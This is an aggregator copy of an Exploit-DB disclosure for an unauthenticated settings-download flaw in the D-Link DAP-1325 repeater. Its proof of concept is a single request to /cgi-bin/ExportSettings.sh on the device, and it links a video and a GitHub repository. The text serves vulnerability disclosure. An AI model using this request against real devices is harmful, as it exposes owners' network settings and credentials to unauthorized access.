3
[webapps] D-Link DAP-1325 - Broken Access Control
source link: https://www.exploit-db.com/exploits/51556
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
D-Link DAP-1325 - Broken Access Control
EDB-ID:
51556
EDB Verified:
# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on:All Platforms
1) Description
Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
IN MY CASE,
Tested repeater IP: http://192.168.0.21/
Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
2) Proof of Concept
Step 1: Go to
Repeater Login Page : http://192.168.0.21/
Step 2:
Add the payload to URL.
Payload:
http://{ip}/cgi-bin/ExportSettings.sh
Payload:
https://github.com/eeduardogoncalves/exploit
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK